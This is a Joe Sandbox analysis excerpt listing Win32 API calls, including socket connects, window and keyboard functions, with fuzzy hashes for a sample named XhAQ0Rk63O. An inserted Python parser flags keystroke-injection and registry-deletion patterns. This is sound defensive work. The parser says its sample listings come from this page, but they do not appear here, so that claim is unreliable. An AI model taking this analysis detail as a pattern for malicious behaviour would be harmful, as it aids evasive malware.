                                                                                          • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?,?), ref: 00447997
                                                                                          • GetCursorPos.USER32(?), ref: 004479A2
                                                                                          • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                          • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1822080540-0
                                                                                          • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                          • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                          • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                          • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                          • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                          • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                          • String ID:
                                                                                          • API String ID: 659298297-0
                                                                                          • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                          • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                          • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                          • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                          APIs
                                                                                          • GetCursorPos.USER32(?), ref: 004478A7
                                                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                          • GetCursorPos.USER32(?), ref: 00447935
                                                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CursorMenuPopupTrack$Proc
                                                                                          • String ID:
                                                                                          • API String ID: 1300944170-0
                                                                                          • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                          • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                          • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                          • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                          APIs
                                                                                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                            • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                            • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                            • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                            • Part of subcall function 004413F0: SendMessageW.USER32(02FE1B10,000000F1,00000000,00000000), ref: 004414C6
                                                                                            • Part of subcall function 004413F0: SendMessageW.USER32(02FE1B10,000000F1,00000001,00000000), ref: 004414F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$EnableMessageSend$LongShow
                                                                                          • String ID:
                                                                                          • API String ID: 142311417-0
                                                                                          • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                          • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                          • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                          • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0044955A
                                                                                            • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                          • _wcslen.LIBCMT ref: 004495C1
                                                                                          • _wcslen.LIBCMT ref: 004495CE
                                                                                          • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                          • String ID:
                                                                                          • API String ID: 1843234404-0
                                                                                          • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                          • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                          • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                          • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
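The listings above all share one shape: an "APIs" list of call sites with module, arguments and a `ref:` address (indented "Part of subcall function" entries for callees), followed by the memory-dump source and the similarity fields. As an added example, not part of this report and not Joe Sandbox tooling, the following Python parses that shape into per-function records and applies a few heuristic tags so the functions worth a second look (synthetic keyboard input via SetKeyboardState/PostMessage/SendInput, the RegEnumKeyEx/RegDeleteKey loop, WritePrivateProfile writes) can be pulled out of a multi-thousand-line report. The sample input is three listings copied from this page with the Opcode/Instruction ID lines dropped; the WIN_MSG table holds well-known Win32 message IDs, and the tag rules are this example's own, not Joe Sandbox signatures.

```python
"""Parse the per-function API listings of a Joe Sandbox report and tag notable
call sequences. Added example, not code from the report or from Joe Sandbox."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: three listings copied from the report above, reduced to the
# lines this parser reads (Opcode/Instruction ID lines are ignored anyway).
SAMPLE = """
APIs
• GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
• SetKeyboardState.USER32(00000080), ref: 0044C3ED
• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
• SendInput.USER32 ref: 0044C509
Memory Dump Source
Similarity
• API ID: KeyboardMessagePostState$InputSend
• Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
APIs
• RegEnumKeyExW.ADVAPI32 ref: 004422F0
• RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
• RegCloseKey.ADVAPI32(00000000), ref: 0044234E
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
• RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
Memory Dump Source
Similarity
• API ID: Enum$CloseDeleteOpen
APIs
• _memset.LIBCMT ref: 0044955A
  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
• SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
Memory Dump Source
Similarity
• API ID: MessageSend_wcslen$_memset_wcspbrk
"""

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                       # call-site address inside the dumped image
    subcall_of: int | None = None  # set for "Part of subcall function" lines

@dataclass
class Function:
    calls: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    fuzzy_hash: str = ""

CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

def parse_report(text: str) -> list[Function]:
    funcs: list[Function] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        # A listing opens with "APIs", or with "Memory Dump Source" when it has none.
        if line == "APIs" or (line == "Memory Dump Source" and section != "APIs"):
            funcs.append(Function())
        if line in ("APIs", "Memory Dump Source", "Similarity"):
            section = line
            continue
        if not funcs:
            continue
        fn = funcs[-1]
        if section == "APIs" and (m := CALL_RE.search(line)):
            args = m.group("args").split(",") if m.group("args") else []
            sub = m.group("sub")
            fn.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                    int(m.group("ref"), 16), int(sub, 16) if sub else None))
        elif line.startswith("• API ID:"):
            fn.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            fn.fuzzy_hash = line.split(":", 1)[1].strip()
    return funcs

# Well-known Win32 message IDs that appear as the second Post/SendMessage argument.
WIN_MSG = {0x000D: "WM_GETTEXT", 0x0101: "WM_KEYUP", 0x0105: "WM_SYSKEYUP"}

def message_ids(fn: Function) -> list[str]:
    ids = [int(c.args[1], 16) for c in fn.calls
           if c.api in ("PostMessageW", "SendMessageW") and len(c.args) > 1 and c.args[1] != "?"]
    return [WIN_MSG.get(i, f"0x{i:04X}") for i in ids]

def flag(fn: Function) -> list[str]:
    """Heuristic tags; these are this example's rules, not Joe Sandbox signatures."""
    apis = {c.api for c in fn.calls}
    msgs = set(message_ids(fn))
    tags = []
    if "SendInput" in apis or msgs & {"WM_KEYUP", "WM_SYSKEYUP"}:
        tags.append("synthetic-keyboard-input")
    if {"RegEnumKeyExW", "RegDeleteKeyW"} <= apis:
        tags.append("recursive-registry-delete")
    if any(a.startswith("WritePrivateProfile") for a in apis):
        tags.append("ini-file-write")
    return tags
```

To use it on a full report, paste the whole function-listing section into a file and call `parse_report(open(path, encoding="utf-8").read())`, then print `fn.api_id`, the lowest direct `ref` and `flag(fn)` for every record with a non-empty tag list. The "Memory Dump Source without APIs" rule exists because some listings (the one following this block, for example) carry no API calls at all and would otherwise be merged into the previous record.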
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                          • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                          • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                          • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                          APIs
                                                                                          • IsWindowVisible.USER32(?), ref: 00445721
                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                          • _wcslen.LIBCMT ref: 004457A3
                                                                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 3087257052-0
                                                                                          • Opcode ID: b8615011704e714012d326b35a72e373024cdcb02b0b49a0115346f3c93ca327
                                                                                          • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                          • Opcode Fuzzy Hash: b8615011704e714012d326b35a72e373024cdcb02b0b49a0115346f3c93ca327
                                                                                          • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                          APIs
                                                                                          • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                          • GetForegroundWindow.USER32 ref: 00459E07
                                                                                          • GetDC.USER32(00000000), ref: 00459E44
                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                          • String ID:
                                                                                          • API String ID: 4156661090-0
                                                                                          • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                          • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                          • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                          • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                          APIs
                                                                                            • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                                          • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                          • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                                          • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                          • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 245547762-0
                                                                                          • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                          • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                          • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                          • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                          • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                          • BeginPath.GDI32(?), ref: 004471B7
                                                                                          • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$BeginCreateDeletePath
                                                                                          • String ID:
                                                                                          • API String ID: 2338827641-0
                                                                                          • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                          • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                          • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                          • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                          • String ID:
                                                                                          • API String ID: 2875609808-0
                                                                                          • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                          • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                          • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                          • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                          APIs
                                                                                          • SendMessageW.USER32 ref: 0046FD00
                                                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                          • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                          • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                          • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DestroyIcon
                                                                                          • String ID:
                                                                                          • API String ID: 3419509030-0
                                                                                          • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                          • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                          • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                          • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 004175AE
                                                                                            • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                            • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                          • __amsg_exit.LIBCMT ref: 004175CE
                                                                                          • __lock.LIBCMT ref: 004175DE
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                          • InterlockedIncrement.KERNEL32(02FE2D00), ref: 00417626
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                          • String ID:
                                                                                          • API String ID: 4271482742-0
                                                                                          • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                          • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                          • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                          • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                          APIs
